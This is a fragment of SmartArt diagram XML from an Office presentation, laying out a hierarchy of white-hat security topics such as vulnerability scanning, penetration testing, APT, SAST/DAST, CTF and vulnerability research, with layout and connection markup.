    <dgm:cxn modelId="{7C9DA4DA-21EE-40AC-9973-CA0E28129962}" type="presParOf" srcId="{A6A9C7FC-9147-4598-BC5E-FC20E01EE7E3}" destId="{AFABE19C-6825-4B8D-A384-D73B2722D664}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{C0ADEE47-DD40-4843-B640-36E565703092}" type="presParOf" srcId="{8C9239A6-2434-4E59-9993-077D1A6A7472}" destId="{684E81F1-C3C3-4EF8-B659-FD062FAA3E43}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{089687CF-143D-46EE-8B29-DAFC81C7379E}" type="presParOf" srcId="{684E81F1-C3C3-4EF8-B659-FD062FAA3E43}" destId="{15486DDF-0DCA-40A0-B85F-71CA7A341155}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{C95C7454-15A1-410D-832A-B8419CBADBDC}" type="presParOf" srcId="{684E81F1-C3C3-4EF8-B659-FD062FAA3E43}" destId="{D7F08D71-4F57-4D2B-A0D2-2A9548F7CF9D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{65E91E51-59CB-48CC-A1BE-CB15E4F49B0D}" type="presParOf" srcId="{8C9239A6-2434-4E59-9993-077D1A6A7472}" destId="{83DC5FA6-66FB-44B9-A3EE-459B1AB79693}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{DED6A792-F238-4D35-AB23-FA456882E775}" type="presParOf" srcId="{83DC5FA6-66FB-44B9-A3EE-459B1AB79693}" destId="{700CB7B3-6759-4BBB-B78E-CD92122D0E89}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{FCD528A6-8ADE-474B-AC3C-7B3EB7312A06}" type="presParOf" srcId="{8C9239A6-2434-4E59-9993-077D1A6A7472}" destId="{ADE22BB6-01C8-4A62-8C03-38F907F979DF}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{91459418-F291-4FF3-A2FD-397D5082F6D2}" type="presParOf" srcId="{ADE22BB6-01C8-4A62-8C03-38F907F979DF}" destId="{BB4CAAB3-0DDC-46FD-A230-5DD8AAD02D7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{30697AC6-5FE6-4AB0-9927-E29E5612D0CC}" type="presParOf" srcId="{ADE22BB6-01C8-4A62-8C03-38F907F979DF}" destId="{FED8EDE0-489D-45D4-88B0-A217936E3C59}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{AAB77106-6DD1-4A13-9A0C-5743F3F4AEE0}" type="presParOf" srcId="{D5A1AC19-36E6-43DA-BAAD-025AD2526CE3}" destId="{ED9D0F85-1789-462F-B716-4A32DDBF2842}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{192879CF-64C0-40CD-8E35-29B597833690}" type="presParOf" srcId="{ED9D0F85-1789-462F-B716-4A32DDBF2842}" destId="{D3E2F5C8-4798-4FCD-914E-E88186659B82}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{D8552BB5-98EB-4130-8396-8CDFF6C33D99}" type="presParOf" srcId="{D5A1AC19-36E6-43DA-BAAD-025AD2526CE3}" destId="{AA1E4EC5-CAC0-440D-AA1A-91B57C508027}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{415F7FDC-90EB-46A1-9E3D-70BDA5D414F6}" type="presParOf" srcId="{AA1E4EC5-CAC0-440D-AA1A-91B57C508027}" destId="{18B0B436-DFF0-443A-B454-3951E93BFE65}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{883E6005-7A0E-493C-A751-C1942B1EA2E0}" type="presParOf" srcId="{AA1E4EC5-CAC0-440D-AA1A-91B57C508027}" destId="{3968AFFE-32D8-4532-977E-7971C1B29B0F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{8CC75369-B22B-4175-87F6-BA899F559557}" type="presParOf" srcId="{D5A1AC19-36E6-43DA-BAAD-025AD2526CE3}" destId="{693A979C-DC12-44DF-A074-F07B6196A5E8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{B110CEAB-8F2C-4C23-8C86-A0E3DFD299D3}" type="presParOf" srcId="{693A979C-DC12-44DF-A074-F07B6196A5E8}" destId="{EEA306E0-2133-40A0-ADC6-1A8582E7FAE0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{6257BDCB-7B0F-4FB6-8846-DA887FDC9BCA}" type="presParOf" srcId="{D5A1AC19-36E6-43DA-BAAD-025AD2526CE3}" destId="{927E8716-1FC0-422E-86AE-3DFFDBD087AF}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{38BC8544-60A4-49C6-A2F3-076C87DDB920}" type="presParOf" srcId="{927E8716-1FC0-422E-86AE-3DFFDBD087AF}" destId="{9DD4ABD0-A59E-445F-B1BD-9A4AEB5A0C7D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{71F75123-D8CD-40F6-8A70-D7C4CFE9BA99}" type="presParOf" srcId="{927E8716-1FC0-422E-86AE-3DFFDBD087AF}" destId="{D8019A2B-AB8E-49D6-960B-D065FAA1A324}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{FAC37EC1-E88B-4C3A-8932-FF7D6336A317}" type="presParOf" srcId="{D5A1AC19-36E6-43DA-BAAD-025AD2526CE3}" destId="{DF86A2E5-D657-4D9D-9FA0-8314F6C76A75}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{865290AD-26C1-4275-A72D-97624F42D6F8}" type="presParOf" srcId="{DF86A2E5-D657-4D9D-9FA0-8314F6C76A75}" destId="{A1B36EAD-EF3D-43E1-9FED-0B990C3EC206}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{FF47FAC5-B03D-4666-A4DB-183F24CBE715}" type="presParOf" srcId="{D5A1AC19-36E6-43DA-BAAD-025AD2526CE3}" destId="{9904BBFB-1074-4078-AB36-3BDBB26EE583}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{E0C22218-57F8-4487-B931-283D02E8B29D}" type="presParOf" srcId="{9904BBFB-1074-4078-AB36-3BDBB26EE583}" destId="{FA9C2F15-D8B0-49A6-99EF-36ED91016DED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{25860F37-D4A8-4059-B8B0-EF261B71D913}" type="presParOf" srcId="{9904BBFB-1074-4078-AB36-3BDBB26EE583}" destId="{CED5A75D-B3C5-4781-80A0-2FCCF5B21479}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5"/>
    <dgm:cxn modelId="{584F0660-BD14-41EA-9C3D-6509A8442C88}" type="presParOf" srcId="{48B8CA99-4E36-4BD7-AFB7-24C543DFD490}" destId="{D2707AC1-6976-408E-A55F-6C76BB7567F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BFD2DD-12F1-43FE-972A-8F8AC55BEB41}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy5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446CF9-05BD-4C54-AD18-AEE4A5D215DF}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
            <a:t>White Hat</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A3E7C3F-996D-4284-A196-5DF5E2B118E6}" type="parTrans" cxnId="{034873FA-182F-40D6-B4DA-9F21E213A933}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{57805A78-8262-44F0-9745-59D508633528}" type="sibTrans" cxnId="{034873FA-182F-40D6-B4DA-9F21E213A933}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA3D112B-D920-4ABB-A039-33BD00D46752}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
            <a:t>Vulnerability Scan</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{890A6ABB-3E2D-4334-9FC3-758713BD2CC3}" type="parTrans" cxnId="{E5AFC930-226C-4C69-9D82-5E6EDFBF1F43}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F18C7A8C-85AB-4167-A0F8-7274646081D0}" type="sibTrans" cxnId="{E5AFC930-226C-4C69-9D82-5E6EDFBF1F43}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60CF3575-3E4A-4BE3-97F9-AEC3574E32BD}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
            <a:t>Penetration test</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D730AB31-4DBE-470B-AE26-7212205AC4ED}" type="parTrans" cxnId="{AF9878F8-2E20-4AE8-8326-28FC56911165}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4FF6B7B2-613D-4801-9956-E8F4498CA060}" type="sibTrans" cxnId="{AF9878F8-2E20-4AE8-8326-28FC56911165}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ECA70AA8-F92C-4B6D-8BC8-3FB27B270AAE}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
            <a:t>APT</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{454DD504-7237-439D-B525-00E73FB2D547}" type="parTrans" cxnId="{CE9552CB-D26D-49C1-BFA5-A4D8C9CBDCBD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7D6DA69D-1E16-409D-8417-09F23149A378}" type="sibTrans" cxnId="{CE9552CB-D26D-49C1-BFA5-A4D8C9CBDCBD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4EEDB951-EAE2-44B4-8336-867C11DAC5F1}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
            <a:t>SRC</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A355094C-BDFB-4BFF-95A6-AB301AB18BC9}" type="parTrans" cxnId="{2553C5B0-54F1-485D-A551-809B071F0718}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7F0A1E73-556C-4A8B-91F0-905028D9EFFD}" type="sibTrans" cxnId="{2553C5B0-54F1-485D-A551-809B071F0718}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F3D6A06F-9188-42EA-A825-328956D535F3}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
            <a:t>B</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
            <a:t>lack Box</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{82E8AEE0-1082-4585-B796-031C06E6EB97}" type="parTrans" cxnId="{281E1325-F7C1-4643-8D22-194BF8BFD75F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2AA2A79-D1EE-4D16-A8EA-7B267FE49388}" type="sibTrans" cxnId="{281E1325-F7C1-4643-8D22-194BF8BFD75F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3157412E-37A6-4C0D-B276-C15BB679E2B3}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
            <a:t>Grey Box</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7DF78917-8119-48B3-8FD1-6B5085F1A8F2}" type="parTrans" cxnId="{767456E8-6A07-41C8-9525-81CAE9025D88}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{04049D0D-7E13-43C7-9174-745D22899B46}" type="sibTrans" cxnId="{767456E8-6A07-41C8-9525-81CAE9025D88}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9DC8297-DA74-4FEE-8038-B8E49C10251F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
            <a:t>White Box</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15DEE5D7-76FA-4651-8E9F-5EF2D8628BAC}" type="parTrans" cxnId="{CC979381-FE46-41A8-B454-C3DD51060AD2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C195133-E762-44F9-8637-775511F36445}" type="sibTrans" cxnId="{CC979381-FE46-41A8-B454-C3DD51060AD2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{859AE946-6B5B-4EB8-B617-A8B630C3A5B2}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
            <a:t>DAST</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{597857DF-DC9C-48B5-B3CD-0A47E034B2EA}" type="parTrans" cxnId="{B9F1F24A-C7D8-406B-A749-B8FDC594C45F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32C5552F-564A-4FC6-A258-F1709B039BE2}" type="sibTrans" cxnId="{B9F1F24A-C7D8-406B-A749-B8FDC594C45F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1CB356B6-ABF8-45F9-826D-64CF0AFB1D04}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
            <a:t>SAST</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9512378D-1112-4C71-B9B9-DE3B9E169C80}" type="parTrans" cxnId="{FE792F6F-DB83-4915-9219-222295751B37}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13E5159B-44A7-4089-8DBF-1DB9E82CBF02}" type="sibTrans" cxnId="{FE792F6F-DB83-4915-9219-222295751B37}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{538D6246-0E2A-46BF-97B7-5313894F212A}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
            <a:t>CTF</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E404FB07-A4BE-4F6A-B012-DA87857FFB5E}" type="parTrans" cxnId="{059459D2-B47F-49CA-9D25-6E6256D3E961}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69EF1869-F427-4F85-B6E5-166B52FB069E}" type="sibTrans" cxnId="{059459D2-B47F-49CA-9D25-6E6256D3E961}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A26134D-D046-4A2A-890F-C6C481761BC4}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="0"/>
            <a:t>Offensive&amp; defensive</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4BDD3AEF-9C9A-4365-8CBA-1919C6BEECC4}" type="parTrans" cxnId="{E9013DD4-6AB2-499A-8A89-64BEB5FA43A6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9CAAEDDD-F110-4385-8DAA-D4613908A8F3}" type="sibTrans" cxnId="{E9013DD4-6AB2-499A-8A89-64BEB5FA43A6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED757123-3CCA-4C9A-A43F-62B267885FCC}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
            <a:t>HVV</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CEEE3681-7561-4613-8383-23C06C85D690}" type="parTrans" cxnId="{3A440A1F-F6DE-404D-9168-AFB869FC9461}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C82E9FAB-BE98-42AF-B096-6177AFCFD918}" type="sibTrans" cxnId="{3A440A1F-F6DE-404D-9168-AFB869FC9461}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{27C0EEB5-6ACA-454B-ADCC-63E37BA9D5D0}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0"/>
            <a:t>Vulnerability research</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DBB3193C-7BE4-4527-A6BD-8F553B114E6C}" type="parTrans" cxnId="{944B5FA3-CDA6-44C8-9B69-CA6E656B2636}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4650A953-FE12-4460-AA9E-C6206F5FCFDC}" type="sibTrans" cxnId="{944B5FA3-CDA6-44C8-9B69-CA6E656B2636}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{48B8CA99-4E36-4BD7-AFB7-24C543DFD490}" type="pres">
      <dgm:prSet presAssocID="{5EBFD2DD-12F1-43FE-972A-8F8AC55BEB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E38D7A-D4AC-4373-80B2-D306076AB239}" type="pres">
      <dgm:prSet presAssocID="{5EBFD2DD-12F1-43FE-972A-8F8AC55BEB41}" presName="hierFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{92DCE4B8-DDE4-43DA-82A6-F5208D56CC16}" type="pres">
      <dgm:prSet presAssocID="{5EBFD2DD-12F1-43FE-972A-8F8AC55BEB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173B5A7-6BC3-4CA3-9C95-0FB1E5DB4C5E}" type="pres">
      <dgm:prSet presAssocID="{EA446CF9-05BD-4C54-AD18-AEE4A5D215DF}" presName="Name17" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7AFB0ECF-FBCA-4EF4-87DE-A26BCB5CA7EB}" type="pres">
      <dgm:prSet presAssocID="{EA446CF9-05BD-4C54-AD18-AEE4A5D215DF}" presName="level1Shape" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1" custScaleX="137533">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D5A1AC19-36E6-43DA-BAAD-025AD2526CE3}" type="pres">
      <dgm:prSet presAssocID="{EA446CF9-05BD-4C54-AD18-AEE4A5D215DF}" presName="hierChild2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{49EFDB88-B92A-43D4-9293-4D84ED0CD031}" type="pres">
      <dgm:prSet presAssocID="{890A6ABB-3E2D-4334-9FC3-758713BD2CC3}" presName="Name25" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{364E3821-782E-4EDD-9D57-708AF266A262}" type="pres">
      <dgm:prSet presAssocID="{890A6ABB-3E2D-4334-9FC3-758713BD2CC3}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{633EC49F-FF2A-4F6D-8912-9C1B100E8C5E}" type="pres">
      <dgm:prSet presAssocID="{AA3D112B-D920-4ABB-A039-33BD00D46752}" presName="Name30" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5ED76F30-F21F-4936-9F25-37834B240C1A}" type="pres">
      <dgm:prSet presAssocID="{AA3D112B-D920-4ABB-A039-33BD00D46752}" presName="level2Shape" presStyleLbl="node2" presStyleIdx="0" presStyleCnt="7" custScaleX="205393"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FD6D6A0E-783C-4CB0-B485-DB4F3E780F07}" type="pres">
      <dgm:prSet presAssocID="{AA3D112B-D920-4ABB-A039-33BD00D46752}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7C3D5C99-09E9-4F54-8006-E96AE45392DF}" type="pres">
      <dgm:prSet presAssocID="{597857DF-DC9C-48B5-B3CD-0A47E034B2EA}" presName="Name25" presStyleLbl="parChTrans1D3" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{927FE169-9205-461E-A39A-7399B608851C}" type="pres">
      <dgm:prSet presAssocID="{597857DF-DC9C-48B5-B3CD-0A47E034B2EA}" presName="connTx" presStyleLbl="parChTrans1D3" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{043A497A-CF01-46DC-B8E5-E1D66E294397}" type="pres">
      <dgm:prSet presAssocID="{859AE946-6B5B-4EB8-B617-A8B630C3A5B2}" presName="Name30" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B239EA25-B8DC-4F6A-AEFC-4D92389D701E}" type="pres">
